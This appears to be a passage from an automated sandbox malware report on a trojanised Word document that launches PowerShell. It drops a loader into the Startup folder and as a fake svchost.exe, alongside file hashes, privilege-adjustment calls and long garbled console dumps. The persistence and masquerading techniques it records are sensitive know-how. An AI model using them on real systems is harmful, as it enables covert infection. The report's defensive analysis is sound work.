Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEB2CC NtQuerySystemInformation,38_2_01DEB2CC
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_002E20504_2_002E2050
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_001D04904_2_001D0490
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_001D0C804_2_001D0C80
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_001D04574_2_001D0457
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02861C605_2_02861C60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 13_2_010B205013_2_010B2050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 13_2_002D0C8013_2_002D0C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 13_2_002D049013_2_002D0490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 20_2_001D049020_2_001D0490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 20_2_001D0C8020_2_001D0C80
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 21_2_002E205021_2_002E2050
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeCode function: 30_2_00B2205030_2_00B22050
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeCode function: 30_2_0024049030_2_00240490
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\CTF loader_es.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037ACEE AdjustTokenPrivileges,5_2_0037ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037ACB7 AdjustTokenPrivileges,5_2_0037ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1ACEE AdjustTokenPrivileges,7_2_01F1ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1ACB7 AdjustTokenPrivileges,7_2_01F1ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209ACEE AdjustTokenPrivileges,9_2_0209ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209ACB7 AdjustTokenPrivileges,9_2_0209ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3ACEE AdjustTokenPrivileges,11_2_01D3ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3ACB7 AdjustTokenPrivileges,11_2_01D3ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211ACEE AdjustTokenPrivileges,14_2_0211ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211ACB7 AdjustTokenPrivileges,14_2_0211ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAACEE AdjustTokenPrivileges,15_2_01CAACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAACB7 AdjustTokenPrivileges,15_2_01CAACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8ACEE AdjustTokenPrivileges,17_2_01B8ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8ACB7 AdjustTokenPrivileges,17_2_01B8ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CACEE AdjustTokenPrivileges,22_2_003CACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CACB7 AdjustTokenPrivileges,22_2_003CACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8ACEE AdjustTokenPrivileges,24_2_01E8ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8ACB7 AdjustTokenPrivileges,24_2_01E8ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200ACEE AdjustTokenPrivileges,26_2_0200ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200ACB7 AdjustTokenPrivileges,26_2_0200ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DACEE AdjustTokenPrivileges,28_2_025DACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DACB7 AdjustTokenPrivileges,28_2_025DACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DACEE AdjustTokenPrivileges,32_2_006DACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DACB7 AdjustTokenPrivileges,32_2_006DACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067ACEE AdjustTokenPrivileges,34_2_0067ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067ACB7 AdjustTokenPrivileges,34_2_0067ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043ACEE AdjustTokenPrivileges,36_2_0043ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043ACB7 AdjustTokenPrivileges,36_2_0043ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEACEE AdjustTokenPrivileges,38_2_01DEACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEACB7 AdjustTokenPrivileges,38_2_01DEACB7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$lignright_companyprofile.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBD6.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................t......................0.......#.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................T.......,u......................0.......#.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......ou......................0......./.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$........u......................0......./.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P..............................u......................0.......;...............|.......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................T........v......................0.......;.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......8v......................0.......G...............".......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............................Uv......................0.......G.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................T.......~v......................0.......S.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................T........v......................0.......S.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e..........v......................0......._............... .......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................v......................0......._.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................)w......................0.......k.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................Fw......................0.......k.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................w......................0.......w.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................w......................0.......................l.......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................w......................0...............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................w......................0...............................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................x......................0...............................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................{......................0.......#.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................1{......................0.......#.........~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................{......................0......./.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................{......................0......./.........~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................T........|......................0.......;...............|.......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................3|......................0.......;.........~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........|......................0.......G.........~.....".......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P..............................|......................0.......G.........~.............(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................X........}......................0.......S.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................=}......................0.......S.........~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................}......................0......._.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................}......................0......._.........~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P............................. ~......................0.......k.......................(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................K~......................0.......k.........~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........~.....2.......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................~......................0.......w.........~.............(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......G.......................0.......................l.......(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......i.......................0.................~.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................$...............................0.................~.............(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T...............................0.................~.............(...............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......T........~......................0.......#.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......T.......3.......................0.......#.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......X...............................0......./.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......T...............................0......./.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8.......$.......!.......................0.......;...............|.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8.......T.......Q.......................0.......;.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......(.......".......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............8.......................................0.......G.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8............... .......................0.......S.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............M.......................0......._.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8.......$.......m.......................0......._.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......(.......2.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............8.......$...............................0.......w.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......$.......+.......................0.......................l.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......$.......F.......................0...............(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8.......T.......q.......................0...............(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......T...............................0...............(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................X...............................0.......#.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................X...............................0.......#.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................T.......%.......................0......./.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................T.......B.......................0......./.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................X.......s.......................0.......;...............|.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................X...............................0.......;.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................X...............................0.......G.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$.......!.......................0.......S.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.$.......I.......................0......._.......x....... .......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................T.......i.......................0......._.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................T...............................0.......k.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................T...............................0.......k.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................T...............................0.......w.......x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$...............................0.......................l.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$.......9.......................0...............x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................$.......b.......................0...............x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$...............................0...............x...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................#...............(.P.....x.......p.......................................0.......#.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....x.......p.......................................0.......#.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."...................../...............(.P.....x.......p.......................................0......./.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....x.......p...............*.......................0......./.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................;...............(.P.....x.......p...............V.......................0.......;.........".....|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....x.......p...............w.......................0.......;.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....x.......p.......................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................S...............(.P.....x.......p.......................................0.......S.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....x.......p.......................................0.......S.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."....................._...............(.P.....x.......p...............*.......................0......._.........".....~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....x.......p...............M.......................0......._.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................k...............(.P.....x.......p...............x.......................0.......k.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....x.......p.......................................0.......k.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....x.......p.......................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.....x.......p.......................................0.................".....l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......p............... .......................0.................................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....x.......p...............H.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......p...............c.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......l.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......l...............L.......................0.......#.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......l...............|.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......l.......................................0......./.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......l.......................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......l.......................................0.......;.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......h.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....T.......l...............0.......................0.......G.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......l...............\.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......l...............}.......................0.......S.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.................................0......._.......h....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......l.......................................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......l.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......l...............%.......................0.......k.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....T.......l...............y.......................0.......w.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......l.......................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......l.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......l.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......l.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................$.......................0.......;...............|.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................B.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......o.......................0.......G...............".......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._...............~.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................%.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................R.......................0.......k.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................p.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......x...............
